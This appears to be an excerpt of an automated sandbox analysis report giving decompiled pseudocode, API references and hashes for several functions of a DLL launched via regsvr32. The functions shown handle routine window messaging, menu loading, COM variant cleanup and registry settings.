Function 1000F210 Relevance: 9.1, APIs: 6, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E1000F210(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E10011BF0(0x1003b066, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t104 = _t73 + _t73 * 4 << 3;
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E10006D96(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E10011C50(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E10010592(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E1000ECE8(_t104, _t124, _t117, _t122, _t124, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E10010578(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x10043098);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x10043018, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}

0x1000f210
0x1000f215
0x1000f21a
0x1000f21d
0x1000f220
0x1000f225
0x1000f22c
0x1000f22f
0x1000f232
0x1000f39d
0x1000f39d
0x1000f3a7
0x1000f3af
0x1000f3af
0x1000f23a
0x1000f240
0x1000f243
0x1000f249
0x00000000
0x00000000
0x1000f24f
0x1000f254
0x1000f257
0x00000000
0x00000000
0x1000f263
0x1000f266
0x1000f276
0x1000f280
0x1000f287
0x1000f28c
0x1000f293
0x1000f298
0x1000f29c
0x1000f2a0
0x1000f2d5
0x1000f2d5
0x1000f2a2
0x1000f2ad
0x1000f2b6
0x1000f2ba
0x1000f2c3
0x1000f2c7
0x1000f2cd
0x1000f2cd
0x1000f2d8
0x1000f2de
0x1000f2e4
0x1000f2e7
0x1000f2ea
0x1000f2f0
0x1000f2f5
0x1000f2f9
0x1000f2fc
0x1000f2fd
0x1000f302
0x1000f307
0x1000f309
0x1000f318
0x1000f32c
0x1000f32f
0x1000f335
0x1000f338
0x1000f343
0x1000f348
0x1000f348
0x1000f352
0x1000f357
0x1000f357
0x1000f361
0x1000f366
0x1000f366
0x1000f36c
0x1000f36f
0x1000f36f
0x1000f307
0x1000f373
0x1000f37b
0x1000f381
0x1000f38b
0x1000f38e
0x1000f38e
0x1000f392
0x1000f392
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000F215
VariantClear.OLEAUT32(?), ref: 1000F2C7
SysFreeString.OLEAUT32(00000000), ref: 1000F348
SysFreeString.OLEAUT32(00000000), ref: 1000F357
SysFreeString.OLEAUT32(00000000), ref: 1000F366
VariantClear.OLEAUT32(00000000), ref: 1000F37B

Part of subcall function 1000ECE8: __EH_prolog.LIBCMT ref: 1000ECED
Part of subcall function 1000ECE8: VariantClear.OLEAUT32(?), ref: 1000ED4F

Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ClearFreeString$H_prolog$Copy
String ID:
API String ID: 3098219910-0
Opcode ID: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
Instruction ID: 75c5e2025475ce32d6cb8a8ad57bceb5efa69f1f793163f183f6db466388bc1f
Opcode Fuzzy Hash: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
Instruction Fuzzy Hash: 455117B1900209AFEB14CFA4C884BEEBBB9FF08355F104529E116EB655D774AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002B9F8 Relevance: 9.1, APIs: 6, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed char _t63;
				intOrPtr* _t85;
				intOrPtr* _t88;

				_t41 =  *0x1004c470; // 0xf256d946
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_v8 = _t41;
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				_t44 = _a8;
				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t44 + 0xa)) = 0;
				 *((char*)(_t44 + 0xb)) = 0;
				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
					_v36 = E100202AB(_t88);
					E100202DF(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
					_t85 = _a8;
					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
					_t63 =  *((intOrPtr*)(_t85 + 9));
					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
						_push(1);
						_push(0);
						goto L7;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L7:
							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
						}
					}
				}
				return E100117AE(_t45, _v8);
			}

0x1002b9fe
0x1002ba05
0x1002ba0a
0x1002ba0b
0x1002ba0e
0x1002ba13
0x1002ba1a
0x1002ba20
0x1002ba23
0x1002ba30
0x1002ba33
0x1002ba36
0x1002ba39
0x1002ba46
0x1002ba5d
0x1002ba60
0x1002ba72
0x1002ba91
0x1002ba94
0x1002baa4
0x1002bab2
0x1002babc
0x1002babe
0x1002bace
0x1002bae1
0x1002bae6
0x1002baf1
0x1002bb20
0x1002bb22
0x00000000
0x1002bafe
0x1002bb03
0x1002bb04
0x1002bb09
0x1002bb16
0x1002bb18
0x1002bb1d
0x1002bb23
0x1002bb26
0x1002bb26
0x1002bb16
0x1002bb2c
0x1002bb38

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

SendMessageA.USER32 ref: 1002BA88
SendMessageA.USER32 ref: 1002BA94
SendMessageA.USER32 ref: 1002BAA4
SendMessageA.USER32 ref: 1002BAB2
SendMessageA.USER32 ref: 1002BABC
InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$InvalidateLongRectWindow
String ID:
API String ID: 74886174-0
Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10030A77 Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10030A77(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E100308EB(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E1003075A(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E100220EE(_t61, GetCapture());
								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E1003075A(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t55 = _v32.pt;
							_t58 = _v8;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_push(_t55);
							_push(_t55);
							_t37 = _t62;
							 *_t37 = _t55;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E1003078E(_t56, 0);
							} else {
								E100306DB(_t56);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E10030A33(_t61, __eflags);
							} else {
								E10030930(_t57, _t58, 0, _t60, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1003A098();
					goto L19;
				}
			}

0x10030a77
0x10030a86
0x10030a8c
0x10030b66
0x00000000
0x10030b66
0x10030a9f
0x10030aaf
0x10030b5f
0x10030b61
0x00000000
0x10030ab5
0x10030ab7
0x10030acf
0x10030ad4
0x10030b34
0x10030b3a
0x10030b43
0x10030b43
0x10030b48
0x10030b4c
0x10030b4e
0x10030b51
0x10030b56
0x10030b59
0x00000000
0x00000000
0x10030b59
0x00000000
0x10030b4c
0x10030ad6
0x10030ad7
0x10030b1f
0x10030b25
0x10030b2d
0x10030b2d
0x00000000
0x10030b25
0x10030ad9
0x10030ade
0x10030af8
0x10030afb
0x10030afe
0x10030b04
0x10030b05
0x10030b06
0x10030b08
0x10030b0a
0x10030b0d
0x10030b0f
0x10030b18
0x10030b11
0x10030b11
0x10030b11
0x00000000
0x10030b0f
0x10030ae1
0x10030ae2
0x10030b77
0x10030b7d
0x10030b7f
0x10030b88
0x10030b81
0x10030b81
0x10030b81
0x00000000
0x10030b8f
0x10030aea
0x00000000
0x00000000
0x10030af0
0x00000000
0x10030af0
0x10030b6d
0x10030b70
0x00000000
0x10030b70

APIs

GetCapture.USER32 ref: 10030A88
SetCapture.USER32(?), ref: 10030A98
GetCapture.USER32 ref: 10030AA4
GetMessageA.USER32 ref: 10030ABE
DispatchMessageA.USER32 ref: 10030AF0
GetCapture.USER32 ref: 10030B4E

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762

Uniqueness

Uniqueness Score: -1.00%

Function 1002A1CA Relevance: 9.1, APIs: 6, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002A1CA(void* __ecx) {
				struct HACCEL__* _t25;
				void* _t44;
				void* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t48;

				_t44 = __ecx;
				_t40 = __ecx + 0x60;
				_t25 =  *(__ecx + 0x60);
				_t45 = 0;
				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
				}
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
					_t48 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					 *(_t44 + 0x30) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
					_t47 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					 *(_t44 + 0x38) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
					_t46 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					 *(_t44 + 0x28) = _t25;
				}
				return _t25;
			}

0x1002a1cd
0x1002a1cf
0x1002a1d2
0x1002a1d4
0x1002a1da
0x1002a1df
0x1002a1df
0x1002a1f3
0x1002a1ff
0x1002a20a
0x1002a213
0x1002a215
0x1002a218
0x1002a218
0x1002a21d
0x1002a229
0x1002a234
0x1002a23d
0x1002a23f
0x1002a242
0x1002a242
0x1002a247
0x1002a253
0x1002a25e
0x1002a267
0x1002a269
0x1002a269
0x1002a270

APIs

LoadMenuA.USER32 ref: 1002A208
LoadAcceleratorsA.USER32 ref: 1002A213
LoadMenuA.USER32 ref: 1002A232
LoadAcceleratorsA.USER32 ref: 1002A23D
LoadMenuA.USER32 ref: 1002A25C
LoadAcceleratorsA.USER32 ref: 1002A267

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Load$AcceleratorsMenu
String ID:
API String ID: 144087665-0
Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002B105 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1002B0CC();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006C53();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x1002b10d
0x1002b115
0x1002b117
0x1002b134
0x1002b142
0x1002b14d
0x1002b14f
0x1002b151
0x1002b153
0x1002b15e
0x1002b160
0x1002b16d
0x1002b16d
0x1002b16f
0x1002b175
0x1002b179
0x1002b197
0x1002b18a
0x1002b18d
0x1002b18f
0x1002b18f
0x1002b179
0x1002b1a0
0x00000000
0x00000000
0x00000000
0x1002b155
0x1002b155
0x1002b156
0x1002b158
0x1002b15a
0x00000000
0x1002b155
0x1002b147
0x1002b149
0x1002b14b
0x00000000
0x00000000
0x00000000
0x1002b14b
0x1002b119
0x1002b120
0x1002b12f
0x1002b12f
0x00000000
0x1002b12f
0x1002b122
0x1002b129
0x00000000
0x00000000
0x1002b12b
0x00000000

APIs

GetWindowLongA.USER32 ref: 1002B137
GetParent.USER32(?), ref: 1002B145
GetParent.USER32(?), ref: 1002B158
GetLastActivePopup.USER32(?), ref: 1002B167
IsWindowEnabled.USER32(?), ref: 1002B17C
EnableWindow.USER32(?,00000000), ref: 1002B18F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290

Uniqueness

Uniqueness Score: -1.00%

Function 1002B501 Relevance: 9.1, APIs: 6, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
				}
				if(_a8 != 0) {
					_t28 = E10035959(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E100358C8(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}

0x1002b50a
0x00000000
0x1002b58b
0x1002b510
0x1002b539
0x1002b53b
0x1002b54f
0x1002b51d
0x00000000
0x1002b51d
0x1002b567
0x1002b56d
0x1002b570
0x00000000
0x1002b57a
0x1002b53f
0x00000000
0x00000000
0x1002b545
0x00000000
0x1002b545
0x1002b517
0x1002b51b
0x1002b525
0x00000000
0x1002b525
0x00000000

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570

Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
String ID:
API String ID: 1886894508-0
Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 10031F4A Relevance: 9.1, APIs: 6, Instructions: 56
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v528;
				void* _v532;
				char _v536;
				intOrPtr _t15;
				long _t22;
				void* _t25;
				void* _t29;

				_t15 =  *0x1004c470; // 0xf256d946
				_v8 = _t15;
				_push( &_v532);
				_push( &_v536);
				_push(_a8);
				_push(0x3e8);
				_t29 = __ecx;
				L1001CA38();
				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
					_t22 = GlobalUnlock(_v532);
					_push(_v532);
					_push(0x8000);
					_push(0x3e4);
					_push(0x3e8);
					_push(_a8);
					L1001CA32();
					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
					if(E100203CE(_t29) != 0) {
						_t25 = E100373B5();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
					}
				}
				return E100117AE(0, _v8);
			}

0x10031f53
0x10031f5a
0x10031f63
0x10031f6a
0x10031f6b
0x10031f73
0x10031f74
0x10031f76
0x10031f93
0x10031f9c
0x10031fa2
0x10031fad
0x10031fb2
0x10031fb3
0x10031fb4
0x10031fb7
0x10031fc4
